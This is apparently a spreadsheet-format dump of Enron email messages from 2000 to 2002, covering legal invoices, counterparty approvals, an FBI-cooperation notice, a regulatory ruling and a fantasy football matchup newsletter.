From: Linda R Guinn on 12/12/2000 12:14 AM_x000D_
To: Angeline Poon/SIN/ECT@ECT_x000D_
cc: Richard B Sanders/HOU/ECT@ECT, Britt Davis/Corp/Enron@ENRON _x000D_
_x000D_
Subject: WFW - pacific virgo invoices_x000D_
_x000D_
Hi Angeline --_x000D_
_x000D_
I received your fax this date regarding the WFW pacific virgo invoice.  What _x000D_
I am looking for is  a copy of the back-up to the statement you sent.  In _x000D_
other words, I need a breakdown of the time billed by each attorney working _x000D_
on this matter.   All I have is the one page listing $137,455.18 -- what does _x000D_
this consist of?  Please forward this to me so I can arrange for payment of _x000D_
this invoice.  Thanks._x000D_
_x000D_
_x000D_
Linda Guinn_x000D_
Enron North America_x000D_
1400 Smith Street_x000D_
Houston, Texas  77002_x000D_
(713) 853-6104_x000D_
(713) 646-3393 (fax)_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 28 Jun 2000 05:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Load Product</t>
  </si>
  <si>
    <t>Your getting way to complicated.   This product may not trade much and until _x000D_
it does we can do most things manually.</t>
  </si>
  <si>
    <t>Thu, 17 Jan 2002 10:36:19 -0800 (PST)</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 1/17/02; HourAhead hour: 9;  HourAhead schedule download failed. Manual intervention required._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2002011709.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Thu, 30 Nov 2000 11:37:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Posting Agreement</t>
  </si>
  <si>
    <t xml:space="preserve">Andy_x000D_
_x000D_
I attach a revised draft of the Agreement, taking into account your most _x000D_
recent comments. The changes are marked._x000D_
_x000D_
I have also introduced a Change in Control clause._x000D_
_x000D_
Many thanks_x000D_
_x000D_
Justin_x000D_
</t>
  </si>
  <si>
    <t>Thu, 15 Mar 2001 15:11:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'brian.lindsay@enron.com', 'claudia.clark@enron.com', 'enron.counterparty@enron.com', 'paul.maley@enron.com', 'trang.le@enron.com', 'david.hardy@enron.com', 'william.bradford@enron.com', 'kelly.lombardi@enron.com', 'lisa.lees@enron.com', 'tanya.rohauer@enron.com', 'cynthia.clark@enron.com', 'amy.heffernan@enron.com', 'juana.fayett@enron.com', 'stephanie.sever@enron.com', 'brant.reves@enron.com', "karen.o'day@enron.com", 'jana.morse@enron.com', 'tom.moran@enron.com', 'mark.taylor@enron.com', 'walter.guidroz@enron.com', 'sonya.clarke@enron.com', 'bill.hare@enron.com', 'lesli.campbell@enron.com', 'debbie.brackett@enron.com', 'tim.davies@enron.com', 'molly.lafuze@enron.com', 'tana.jones@enron.com', 'karen.lambert@enron.com', 'danny.clark@enron.com', 'bernice.rodriguez@enron.com'})</t>
  </si>
  <si>
    <t>Re: EOL approvals, 3-8-01 _ GCP Response - Correction</t>
  </si>
  <si>
    <t xml:space="preserve">Please note the Counterparty Name correction below:_x000D_
_x000D_
CP/ID 754 - Bonneville Power Administration corrected on the spreadsheet _x000D_
below from Bonneville Power Association._x000D_
_x000D_
 _x000D_
_x000D_
Rgds._x000D_
_x000D_
Samuel x3-9890_x000D_
(GCP_Enron Networks)_x000D_
_x000D_
_x000D_
_x000D_
From: Tana Jones on 03/15/2001 06:36 PM_x000D_
To: Samuel Schott/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: EOL approvals, 3-8-01 _ GCP Response  _x000D_
_x000D_
Sam,_x000D_
_x000D_
I think counterparty ID# 754 is Bonneville Power Administration, not _x000D_
Bonneville Power Association._x000D_
_x000D_
_x000D_
_x000D_
	Samuel Schott_x000D_
	03/08/01 05:32 PM_x000D_
		_x000D_
		 To: Walter Guidroz/ENRON@enronXgate @ ENRON, Karen Lambert/HOU/ECT@ECT, Tana _x000D_
Jones/HOU/ECT@ECT, Mark Taylor/HOU/ECT@ECT, Brant _x000D_
Reves/ENRON@enronXgate@ENRON, Debbie R Brackett/HOU/ECT@ECT, David _x000D_
Hardy/LON/ECT@ECT, Lesli Campbell/ENRON@enronXgate@ENRON, Cynthia _x000D_
Clark/ENRON@enronXgate@ENRON, Enron Europe Global Contracts and _x000D_
Facilities@ENRON, Enron Europe Global CounterParty/LON/ECT@ECT, Stephanie _x000D_
Sever/HOU/ECT@ECT, Tom Moran/ENRON@enronXgate@ENRON, Claudia _x000D_
Clark/HOU/ECT@ECT, William S Bradford/ENRON@enronXgate@ENRON, Lisa _x000D_
Lees/HOU/ECT@ECT, Juana Fayett/Corp/Enron@Enron, Jana Morse/Corp/Enron@Enron, _x000D_
Trang Le/HOU/ECT@ECT, Paul Maley/LON/ECT@ECT, Sonya Clarke/LON/ECT@ECT, Tim _x000D_
Davies/LON/ECT@ECT, Karen O'Day/NA/Enron@Enron, Tanya _x000D_
Rohauer/ENRON@enronXgate@ENRON, Kelly Lombardi/NA/Enron@Enron, Brian _x000D_
Lindsay/Enron Communications@Enron Communications@ENRON, EOL Call _x000D_
Center@ENRON, Bernice Rodriguez/HOU/ECT@ECT, Bill D Hare/HOU/ECT@ect, Amy _x000D_
Heffernan/Enron Communications@Enron Communications@ENRON, Molly LaFuze/Enron _x000D_
Communications@Enron Communications@ENRON, Danny Clark/Enron _x000D_
Communications@Enron Communications@ENRON_x000D_
		 cc: _x000D_
		 Subject: Re: EOL approvals, 3-8-01 _ GCP Response_x000D_
_x000D_
Any GCP adjustments will be highlighted in red._x000D_
_x000D_
 _x000D_
_x000D_
Rgds._x000D_
_x000D_
Samuel x3-9890_x000D_
(GCP_Enron Networks)_x000D_
_x000D_
_x000D_
_x000D_
From: Walter Guidroz/ENRON@enronXgate on 03/08/2001 05:24 PM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3-8-01_x000D_
_x000D_
Please see attached._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 16 Feb 2001 06:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: i have 4 tickets to diana ross at rodeo tonight that probably_x000D_
 can't use. any takers?</t>
  </si>
  <si>
    <t xml:space="preserve">No can do.  Thanks anyway._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Lisa Mellencamp@ECT_x000D_
02/16/2001 12:27 PM_x000D_
To: Shirley A Hudler/HOU/ECT@ECT, Cindy Hudler/HOU/ECT@ECT, Kelly H _x000D_
Boots/HOU/ECT@ECT, Cheryl Lipshutz/HOU/EES@EES, Cynthia Harkness/Enron _x000D_
Communications@Enron Communications, Kathy M Lynn/Corp/Enron@Enron, Anne C _x000D_
Koehler/HOU/ECT@ECT, Barbara N Gray/HOU/ECT@ECT, Teresa G _x000D_
Bushman/HOU/ECT@ECT, Mary Cook/HOU/ECT@ECT, Kay Mann/Corp/Enron@Enron, Sheila _x000D_
Tweed/HOU/ECT@ECT, Julia Murray/HOU/ECT@ECT, Michelle Cash/HOU/ECT@ECT, _x000D_
Angela Davis/NA/Enron@Enron, Shari Stack/HOU/ECT@ECT, Carol St. Claire, Janet _x000D_
H Moore/HOU/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: i have 4 tickets to diana ross at rodeo tonight that probably can't _x000D_
use. any takers?_x000D_
_x000D_
Lisa J. Mellencamp_x000D_
Enron North America Corp. - Legal_x000D_
1400 Smith St._x000D_
Houston, TX  77002_x000D_
Tel:  (713) 853-7986_x000D_
Fax: (713) 646-3393_x000D_
E-mail:  Lisa.Mellencamp@enron.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 23 Jan 2002 21:01:08 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Cooperation with the FBI</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
_x000D_
-----Original Message----- _x000D_
From: Legal - James Derrick Jr. _x000D_
Sent: Wed 1/23/2002 9:26 PM _x000D_
To: DL-GA-all_enron_houston _x000D_
Cc: _x000D_
Subject: Cooperation with the FBI_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Enron has consented to allow the Federal Bureau of Investigation to search the Enron Building and to interview employees regarding allegations of document destruction.  The company encourages all employees to fully cooperate with the FBI._x000D_
_x000D_
The company has retained Michael Levy and his law firm Swidler, Berlin, Shereff, Friedman, to advise any employee regarding this matter and to be present with them during any interviews by government investigators.  If you would like to speak with an attorney, please contact Ned Crady of the Legal Department at 3-4558 or contact Michael Levy's office in Washington, D.C. at 202-295-8414 and they will direct you to him here in Houston.</t>
  </si>
  <si>
    <t>Mon, 19 Nov 2001 06:19:47 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Motion to Strike in Illinois Power Proceeding</t>
  </si>
  <si>
    <t xml:space="preserve">This means that the DST proceeding moves forward - right?_x000D_
_x000D_
How about a phone call at 3pm HOUSTON TIME to catch up on all matters?_x000D_
_x000D_
Jim_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Migden, Janine  _x000D_
Sent:	Friday, November 16, 2001 11:02 AM_x000D_
To:	Shapiro, Richard; Steffes, James D.; Boston, Roy; Kingerski, Harry; Ulrich, Marc; Sharfman, Guy; Merola, Jeff_x000D_
Subject:	FW: Motion to Strike in Illinois Power Proceeding_x000D_
_x000D_
_x000D_
...has been denied unfortunately._x000D_
 -----Original Message-----_x000D_
From: 	"Townsend, Christopher J. - CHI" &lt;christopher.townsend@piperrudnick.com&gt;@ENRON  _x000D_
Sent:	Thursday, November 15, 2001 3:40 PM_x000D_
To:	'jmigden@enron.com'; 'rboston@enron.com'_x000D_
Cc:	Fein, David I. - CHI_x000D_
Subject:	Motion to Strike in Illinois Power Proceeding_x000D_
_x000D_
We have been informed that at this morning's status hearing, without_x000D_
substantive discussion, the ALJ in the Illinois Power proceeding denied_x000D_
Enron's motion to strike.  Please feel free to call if you would like to_x000D_
discuss.  Thank you._x000D_
_x000D_
&gt; Christopher J. Townsend_x000D_
&gt; Piper Marbury Rudnick &amp; Wolfe_x000D_
&gt; 203 N. LaSalle Street_x000D_
&gt; Chicago, IL 60601_x000D_
&gt; (312) 368-4039 (direct line)_x000D_
&gt; (312) 630-6300 (direct fax)_x000D_
&gt; christopher.townsend@piperrudnick.com_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
_____________________________________________________________________________x000D_
The information contained in this communication may be confidential, is_x000D_
intended only for the use of the recipient named above, and may be legally_x000D_
privileged.  If the reader of this message is not the intended recipient,_x000D_
you are hereby notified that any dissemination, distribution, or copying of_x000D_
this communication, or any of its contents, is strictly prohibited. If you_x000D_
have received this communication in error, please re-send this communication_x000D_
to the sender and delete the original message and any copy of it from your_x000D_
computer system._x000D_
Thank you._x000D_
_x000D_
For more information about Piper Marbury Rudnick &amp; Wolfe, please visit us at_x000D_
http://www.piperrudnick.com_x000D_
_____________________________________________________________________________x000D_
</t>
  </si>
  <si>
    <t>Fri, 1 Dec 2000 03:55:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ryan_balgopal@scotiamarkets.com'})</t>
  </si>
  <si>
    <t>I had to flee to Houston. _x000D_
_x000D_
cd</t>
  </si>
  <si>
    <t>Thu, 16 Nov 2000 21:18:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bryant@cheatsheets.net'})</t>
  </si>
  <si>
    <t>frozenset({'cheatsheets@egroups.com'})</t>
  </si>
  <si>
    <t>[cheatsheets] #132 Week 12 Rushing Game Matchups</t>
  </si>
  <si>
    <t xml:space="preserve">?=20_x000D_
_x000D_
Rushing Game Matchups???  Here's how I see  the matchups this week.? Please=_x000D_
 =20_x000D_
note, see the cheatsheet online  http://www.cheatsheets.net/week12sheet.htm=_x000D_
?_x000D_
for exactly where I rank players  and to determine who to start.? Just =20_x000D_
because one matchup may be more favorable than another, that doesn't=20_x000D_
necessarily  mean I'd start the player with the best matchup.? The matchup=_x000D_
=20_x000D_
info is meant to be just one  more tool in your box when it comes to decidi=_x000D_
ng=20_x000D_
between players.??=20_x000D_
_x000D_
?_x000D_
_x000D_
_x000D_
_x000D_
Locks:? These games heavily favor the  Offense_x000D_
_x000D_
Tennessee=01,s Eddie George vs Brown  Defense?? Assuming Eddie George can g=_x000D_
et=20_x000D_
his  injured toe healthy (and I think he can) he could have a monster game=_x000D_
=20_x000D_
against a  Brown Defense that=01,s been terrible against the rush.? For the=_x000D_
=20_x000D_
year, they rank # 26 in Fantasy  Points allowed to the opposing RB and they=_x000D_
=20_x000D_
rank # 27 in rushing yards allowed  per game over the last four weeks.?  Th=_x000D_
e=20_x000D_
Titans will likely be fired up after a stinging loss at home to the  Ravens=_x000D_
=20_x000D_
and I expect George to take out some frustrations on the  Browns._x000D_
_x000D_
Miami=01,s Lamar Smith vs Jets  Defense?? You=01,ll have to look awfully ha=_x000D_
rd  to=20_x000D_
find a hotter RB than Lamar Smith.?  In their week?8 matchup, he ran for 2=_x000D_
=20_x000D_
TDs and 155 yards.? At the time, it seemed like a fluke but  Smith has=20_x000D_
maintained almost that pace since then.? Jay Fiedler and the passing game=_x000D_
=20_x000D_
provide  just enough threat to keep the defenses semi honest and Smith does=_x000D_
=20_x000D_
the  rest.? Over the last four weeks, the  Jets rank # 26 in rushing yards=_x000D_
=20_x000D_
allowed per  game._x000D_
_x000D_
New York Giant=01,s Ron Dayne / Tiki  Barber vs Lion Defense?? As you know =_x000D_
by=20_x000D_
now, the Giants  running game is governed by how close they keep the game.?=_x000D_
=20_x000D_
Coach Jim Fassell abandons the ground  game (especially Ron Dayne=01,s role=_x000D_
)=20_x000D_
when the Giants start to trail.? Against a less than explosive Lions  team,=_x000D_
=20_x000D_
the Giants ought to be able to keep this very close if not lead most of  th=_x000D_
e=20_x000D_
way.? Detroit=01,s been weak  defending the run over the last four weeks wh=_x000D_
ere=20_x000D_
they rank # 25 in rushing yards  allowed per game.? =20_x000D_
_x000D_
Indianapolis=01, Edgerrin James vs Packer  Defense?? Green Bay=01,s allowin=_x000D_
g 135=20_x000D_
yards  rushing per game over the last four week which ranks them # 22.? Jam=_x000D_
es=20_x000D_
should continue to roll this week  against a Packer Defense that=01,s missi=_x000D_
ng LB=20_x000D_
Brian Williams who=01,s out with a knee  injury.? DE Vonnie Holiday may be =_x000D_
=20_x000D_
limited but he looks like he=01,ll play and that=01,s some concern but I st=_x000D_
ill=20_x000D_
look  for James to romp._x000D_
_x000D_
Baltimore=01,s Jamal Lewis vs Cowboy  Defense?? The Cowboys gave up their 2=_x000D_
00=20_x000D_
yard  rushing days to quick slasher RBs Charlie Garner and Duce Staley but =_x000D_
I=01,_x000D_
m  guessing power running Jamal Lewis (who=01,s almost as quick as those gu=_x000D_
ys)=20_x000D_
will be  a great play against Dallas.? For  the season, Dallas ranks # 28 i=_x000D_
n=20_x000D_
Fantasy Points allowed to the opposing RB.? Look for him to catch the ball=_x000D_
=20_x000D_
out of  the backfield as well._x000D_
_x000D_
?_x000D_
_x000D_
_x000D_
_x000D_
Prime Matchups:?  These games favor the Offense?_x000D_
_x000D_
San Diego=01,s  Terrell Fletcher / Jermaine Fazande vs Bronco Defense??  Ov=_x000D_
er=20_x000D_
the last four week, Denver ranks # 31 in rushing yards allowed per  game.??=_x000D_
=20_x000D_
This  game smells a lot like the Denver / Bengal game to me.? Winless team=_x000D_
=20_x000D_
comes into town with a big  power back and nothing to lose.? We  all rememb=_x000D_
er=20_x000D_
Corey Dillon=01,s record setting day and many remember Jermaine  Fazande=01=_x000D_
,s big=20_x000D_
day rushing in the last game of 1999 against the Broncos.? Terrell Fletcher=_x000D_
=20_x000D_
is working his way into  the mix and that=01,s really muddying the waters.?=_x000D_
 Keep=20_x000D_
an eye on this one and if it looks  like one of these guys will garner the=_x000D_
=20_x000D_
bulk of the carries, he could be worth a  flyer.? =20_x000D_
_x000D_
_x000D_
_x000D_
Philadelphia=01,s Stanley Pritchett / Darnell Autry vs  Cardinal Defense? T=_x000D_
he=20_x000D_
Arizona defense remains pretty weak  against the rush.? They rank # 29  in=_x000D_
=20_x000D_
rushing yards allowed  per game over the last four weeks.? For the year, th=_x000D_
ey=20_x000D_
rank # 31  in Fantasy Points  allowed to the opposing RB.? The trick is=20_x000D_
determining which Eagle RB  will get the carries.? I like  Pritchett becaus=_x000D_
e=20_x000D_
he=01,s bigger and can bull doze his way through the Cards.? I=01,ve been d=_x000D_
own on=20_x000D_
Autry as I believe  you=01,re supposed to have the acting career?after the=_x000D_
=20_x000D_
football career, not  the other way around=01(?_x000D_
_x000D_
Arizona=01,s  Michael Pittman vs Eagle Defense??  Watch this one closely as=_x000D_
=20_x000D_
Pittman is struggling to get healthy with  bruised ribs.? If he can go, I=_x000D_
=20_x000D_
like  the matchup this week.? Philadelphia  ranks # 30 in rushing  yards=20_x000D_
allowed per game over the last four weeks.? They=01,re stronger over the ye=_x000D_
ar=20_x000D_
where  they rank # 18 in  Fantasy Points allowed to the opposing RB.? Thoma=_x000D_
s=20_x000D_
Jones is in worse shape with  pneumonia so Pittman has incentive to get out=_x000D_
=20_x000D_
there.?_x000D_
_x000D_
Buffalo=01,s  Sammy Morris / Shawn Bryson vs Chief Defense??  Morris battli=_x000D_
ng a=20_x000D_
bad ankle and looks to be a game time decision.? Bryson is plenty capable i=_x000D_
f=20_x000D_
he can=01,t  go.? The Chiefs are an attractive  matchup as they rank # 28 i=_x000D_
n=20_x000D_
rushing yards allowed per  game over the last four weeks.? They rank # 27 i=_x000D_
n=20_x000D_
Fantasy Points allowed to the  opposing RB for the year.?  Watch this one=_x000D_
=20_x000D_
closely to see if the Bills offer hints to who=01,ll they=01,ll  go with.?_x000D_
_x000D_
Green Bay=01,s  Ahman Green vs Colt Defense?? With Dorsey Levens out again,=_x000D_
 =20_x000D_
Green will be asked to carry the load?  The Colts are vulnerable to the rus=_x000D_
h=20_x000D_
ranking # 24 in rushing yards allowed per  game over the last four weeks.? =_x000D_
If=20_x000D_
Brett Favre can play, that=01,ll be a  nice boost for Green as the defense =_x000D_
won=01,t=20_x000D_
be able to key on stopping the ground  game.?_x000D_
_x000D_
Cincinnati=01,s  Corey Dillon vs Patriot Defense?? How much would you rely =_x000D_
on=20_x000D_
Scot  Mitchell if you were Dick LeBeau??  Me neither.? Whether it=01,s  Aki=_x000D_
li=20_x000D_
Smith or Scott Mitchell under center, it=01,s still the Corey Dillon  Show.=_x000D_
? New=20_x000D_
England has shown itself  to vulnerable against the rush ranking # 23 in=20_x000D_
rushing yards allowed per  game over the last four weeks.? Dillon knows he=_x000D_
=20_x000D_
needs to carry the team  and he=01,ll do his best.? His success  will depen=_x000D_
d on=20_x000D_
how effect Mitchell can be in drawing the defense=01,s attention  toward th=_x000D_
e=20_x000D_
passing game._x000D_
_x000D_
??_x000D_
_x000D_
Even Matchups:? These games  feature no real advantage either way_x000D_
_x000D_
San Francisco=01,s Charlie Garner vs  Falcon Defense??  Charlie Garner =20_x000D_
continues his great season against a Falcon team that=01,s playing better r=_x000D_
ush =20_x000D_
defense than it had been.? For the  year, Atlanta ranks # 30 in Fantasy=20_x000D_
Points allowed to the opposing RB but over  the last four weeks, they rate =_x000D_
#=20_x000D_
19 in rushing yards allowed per game.? If they=01,re without WR Terrell Owe=_x000D_
ns =20_x000D_
again, Garner will be asked to carry a little more of the load, something h=_x000D_
e=01,_x000D_
s  gladly done all year._x000D_
_x000D_
_x000D_
_x000D_
Pittsburgh=01,s Jerome Bettis vs Jaguar  Defense?? With the WR shuffling go=_x000D_
ing=20_x000D_
on in  Pittsburgh, I think Bettis is really the only Steeler worthy of=20_x000D_
starting in most  leagues.? He=01,s a solid performer  though that should h=_x000D_
ave=20_x000D_
another good day grinding the ball out.? Jacksonville ranks # 18 over the=_x000D_
=20_x000D_
last  four weeks in rushing yards allowed per game.? For the year, they ran=_x000D_
k=20_x000D_
# 20 in Fantasy  Points allowed to the opposing RB.?  It=01,ll be power foo=_x000D_
tball=20_x000D_
as the Steeler just line up and try to run over  the Jaguars.?_x000D_
_x000D_
New England=01,s J.R. Redmond / Kevin  Faulk vs Bengal Defense?? The Bengal=_x000D_
s are=20_x000D_
tough to  predict.? For the last four weeks,  they rank # 17 in rushing yar=_x000D_
ds=20_x000D_
allowed per game and for the year they come in  at # 14 in Fantasy Points=_x000D_
=20_x000D_
allowed to the opposing RB.? But they absolutely shut down RB Emmitt  Smith=_x000D_
=20_x000D_
last week.? I look for Redmond  and Faulk to have moderate success against=_x000D_
=20_x000D_
this improving unit.? Redmond is questionable with ribs so  keep an eye on=_x000D_
=20_x000D_
this one.?_x000D_
_x000D_
Chicago=01,s James Allen vs Buccaneer  Defense?? As with the pass defense,=_x000D_
=20_x000D_
Tampa  Bay is good but not quite as dominant as their reputation.? For the=_x000D_
=20_x000D_
last four weeks, they rank # 16  in rushing yards allowed per game allowing=_x000D_
=20_x000D_
106 per game.? For the year, they rate # 9 in Fantasy  Points allowed to th=_x000D_
e=20_x000D_
opposing RBs so it=01,s not like they=01,re invincible.? With Shane Matthew=_x000D_
s behind=20_x000D_
center and  scaring no one though, it could be a long  day.?_x000D_
_x000D_
Washington=01,s Stephen Davis vs Ram  Defense?? As is so often the case, th=_x000D_
e =20_x000D_
Redskins could be forced to abandon their running game if the Rams jump out=_x000D_
 =20_x000D_
early.? Washington would dearly love  to establish Stephen Davis on the=20_x000D_
ground but they may not be able to if they=01,re  forced to play catchup.? =_x000D_
The=20_x000D_
Rams  rate # 15 over the last four weeks in rushing yards allowed per game.=_x000D_
?=20_x000D_
For the year, they check in at # 23 in  Fantasy Points allowed to the=20_x000D_
opposing RB.?  Even with Bud Carson helping coach the defense, they can be=_x000D_
=20_x000D_
run  upon.?_x000D_
_x000D_
Atlanta=01,s Jamal Anderson vs 49er  Defense?? Jamal Anderson continues to =_x000D_
make =20_x000D_
solid improvement and he seems close to his 1998 form to me.? He=01,ll face=_x000D_
 a=20_x000D_
49er Defense that can  definitely be run on.? Over the last  four weeks, th=_x000D_
ey=20_x000D_
rate # 14 in rushing yards allowed per game but for the year,  they rank # =_x000D_
29=20_x000D_
in Fantasy Points allowed to the opposing RB.? Not unlike the situation wit=_x000D_
h =20_x000D_
Washington, the running back=01,s success largely hinges on the ability of =_x000D_
the =20_x000D_
defense to hang tough.? Anderson can  be taken out of the game if the Falco=_x000D_
ns=20_x000D_
can=01,t hold Jeff Garcia and company down  in the passing game.???_x000D_
_x000D_
Minnesota=01,s Robert Smith vs Panther  Defense? I=01,ve said for years I=_x000D_
=01,d love to=20_x000D_
see  Robert Smith play a full season and now we=01,re seeing that could loo=_x000D_
k=20_x000D_
like.? He=01,s having a great year and I think  he=01,ll continue to have s=_x000D_
uccess=20_x000D_
against Carolina.? They=01,ve been pretty strong lately  against the rush=_x000D_
=20_x000D_
ranking # 11 in rushing yards allowed per game over the last  four weeks bu=_x000D_
t=20_x000D_
for the year, they rank # 24 in Fantasy Points allowed to the  opposing RB.=_x000D_
?=20_x000D_
If the Vikings can  control Carolina=01,s Steve Beuerlein (no small feat), =_x000D_
it=01,ll=20_x000D_
help Smith=01,s chances  immensely._x000D_
_x000D_
??_x000D_
_x000D_
Downside Matchups:? These games favor the  Defense_x000D_
_x000D_
Jacksonville=01,s  Fred Taylor vs Steeler Defense?? Fred Taylor is beginnin=_x000D_
g to=20_x000D_
work  his way out most Fantasy GM=01,s dog house as he continues to be a br=_x000D_
ight=20_x000D_
spot on a  team without many bright spots.?  He=01,s been running hard but =_x000D_
this=20_x000D_
will be a real gut check for him as he  squares off against a very tough=20_x000D_
Steeler rush defense that=01,s only allowed 2 TDs  over the last four games=_x000D_
.? =20_x000D_
Pittsburgh ranks # 3 for the year in Fantasy Points allowed to the  opposin=_x000D_
g=20_x000D_
RB and Taylor will have his hands  full._x000D_
_x000D_
Carolina=01,s  Tshimanga Biakubutuka vs Viking Defense?? Biakabutuka remain=_x000D_
s=20_x000D_
very  questionable with a bad toe and the Panthers don=01,t sound very=20_x000D_
optimistic about  him playing Sunday.? Keep an eye on  it as he was able to=_x000D_
=20_x000D_
play through the pain last week.? Although it seems to be worse this week =_x000D_
=20_x000D_
than last.? If he can=01,t go, you=01,ll  see undrafted rookie FB Brad Hoov=_x000D_
er get=20_x000D_
the start.? Don=01,t ask me how that happens.? Minnesota is decent against =_x000D_
the=20_x000D_
run  ranking # 12 over the last four games in rushing yards allowed per gam=_x000D_
e=20_x000D_
and # 17  for the year in Fantasy Points allowed to the opposing  RB._x000D_
_x000D_
Tampa Bay=01,s  Warrick Dunn / Mike Alstott vs Bear Defense?? Most people=_x000D_
=20_x000D_
including myself  thought new offensive coordinator Les Steckel would invol=_x000D_
ve=20_x000D_
Mike Alstott more in  Frank Wycheck type roles.? Hasn=01,t  happened yet bu=_x000D_
t it=01,_x000D_
ll be interesting to see if they start getting the big guy  the balls in=20_x000D_
creative ways.? I=01,m  sure his fumbling problems are still a huge concern=_x000D_
 but=20_x000D_
of course that=01,s not  something a guy like Tony Dungy talks very publicl=_x000D_
y=20_x000D_
about.? The Bears are decent against the run  ranking # 9 over the last fou=_x000D_
r=20_x000D_
weeks in rushing yards allowed per game but for  the year, they check in at=_x000D_
 #=20_x000D_
21 in Fantasy Points allowed to the opposing  RB.? =20_x000D_
_x000D_
Denver=01,s  Terrell Davis vs Charger Defense??  Davis scared everyone this=_x000D_
 week=20_x000D_
when it was reported he had a problem  with his calf.? He says it=01,s =20_x000D_
overblown and was calling it just =01&amp;tightness=018 below the knee. ?He=01,=_x000D_
ll need to=20_x000D_
be as healthy as possible  this week as the Chargers have been playing stro=_x000D_
ng=20_x000D_
rush defense of late ranking  # 2 in rushing yards  allowed per game over t=_x000D_
he=20_x000D_
last four weeks.? For the year, they=01,re still ranked # 15  in Fantasy Po=_x000D_
ints =20_x000D_
allowed to the opposing RB reflecting some of their earlier  struggles.? Th=_x000D_
e=20_x000D_
Broncos desperately  need Davis to shoulder the load with Brian Griese out=_x000D_
=20_x000D_
and it=01,ll be interesting  to see how he responds.? It=01,s a  tough matc=_x000D_
hup, but=20_x000D_
I bet he does well._x000D_
_x000D_
St. Louis=01, Justin  Watson vs Redskin Defense?? The good news for Watson =_x000D_
is=20_x000D_
that  he doesn=01,t have to worry about Trung Canidate.? The bad news is Ro=_x000D_
bert=20_x000D_
Holcomb saw a  good bit of work at tailback this week and Marshall Faulk is=_x000D_
=20_x000D_
even making noise  about playing Monday.? Faulk did  practice some Thursday=_x000D_
=20_x000D_
but coach Mike Martz still remains pessimistic about him  seeing much actio=_x000D_
n=20_x000D_
this week.? Keep  an eye on it as I=01,m sure it=01,ll be a top story but r=_x000D_
ight=20_x000D_
now, he doesn=01,t look to  be a big factor.? The Redskin rush  defense is =_x000D_
solid=20_x000D_
ranking # 8 over the last four weeks in rushing yards allowed  per game and=_x000D_
 #=20_x000D_
6 for the year in Fantasy Points allowed to the opposing  RB._x000D_
_x000D_
??_x000D_
_x000D_
Defensive Slam Dunks:? These  games heavily favor the Defense?_x000D_
_x000D_
Cleveland=01,s Travis Prentice / Jamel  White vs Titan Defense?  ?The Brown=_x000D_
s=20_x000D_
catch Tennessee at an awful  time as the Titans are coming off a frustratin=_x000D_
g=20_x000D_
loss at home to Baltimore and  will likely be looking to vent some=20_x000D_
frustrations this week.? Cleveland looks to bear the brunt of  that=20_x000D_
situation.? Prentice and White  have been unexceptional lately and I don=01=_x000D_
,t=20_x000D_
see them improving against a tough  Titan Defense.? Over the last four =20_x000D_
weeks, Tennessee ranks # 7 in rushing yards allowed per game.? They also ra=_x000D_
nk=20_x000D_
# 7 for the year in  Fantasy Points allowed to the opposing RB.?  These guy=_x000D_
s=20_x000D_
may do in a pinch on other weeks but I don=01,t see it this  Sunday.?_x000D_
_x000D_
Detroit=01,s James Stewart vs Giant  Defense?? Stewart is still a starter i=_x000D_
n=20_x000D_
many  leagues but I don=01,t like his matchup here.?  (Although you can=01,=_x000D_
t=20_x000D_
discount the time he ran wild on Tampa Bay with an  awful matchup too)? The=_x000D_
=20_x000D_
Giants rank  # 1 for the year in Fantasy Points allowed to the opposing RB.=_x000D_
?=20_x000D_
For the last four weeks, they rank # 6  in rushing yards allowed per game.?=_x000D_
 =20_x000D_
That=01,s strong.? Having a  healthy Jason Sehorn back will help the entire=_x000D_
=20_x000D_
defense as it allows more safety  help to commit to the run.?_x000D_
_x000D_
Oakland=01,s Napoleon Kaufman vs Saints  Defense?? Keep an eye on it, but a=_x000D_
t=20_x000D_
this  point Tyrone Wheatley is looking very questionable with not one but t=_x000D_
wo=20_x000D_
bad  ankle sprains.? His most recent  sprain is thought to be worse than th=_x000D_
e=20_x000D_
first sprain on the other ankle that was  limiting him already.? Kaufman =_x000D_
=20_x000D_
struggles a bit as the sole RB and Saints are RB Killers.? For the year, th=_x000D_
ey=20_x000D_
rank # 4 in Fantasy  Points allowed to the opposing RB and over the last fo=_x000D_
ur=20_x000D_
games, they check in at  # 5 in rushing yards allowed per game.?  One ray o=_x000D_
f=20_x000D_
hope for Oakland is that DT Norman Hand is questionable with  bone chips in=_x000D_
=20_x000D_
his ankle although they believe he can play even though he hasn=01,t  pract=_x000D_
iced=20_x000D_
this week.?_x000D_
_x000D_
Kansas  City=01,s RB committee vs Bills Defense??  By now you probably know=_x000D_
=20_x000D_
better than to risk starting any RB wearing a  Chief uniform.? This week=01=_x000D_
,s a=20_x000D_
good  week to follow that rule as the Bills are playing excellent rush=20_x000D_
defense.? They rank # 4 over the last four weeks  in rushing yards allowed =_x000D_
=20_x000D_
per game and the rate # 5 for the year in Fantasy Points allowed to the =20_x000D_
opposing RB.? I shy  away from Chief RBs against any team but especially a=_x000D_
=20_x000D_
defense this tough.? If you don=01,t have any choice, Kimble  Anders will g=_x000D_
et=20_x000D_
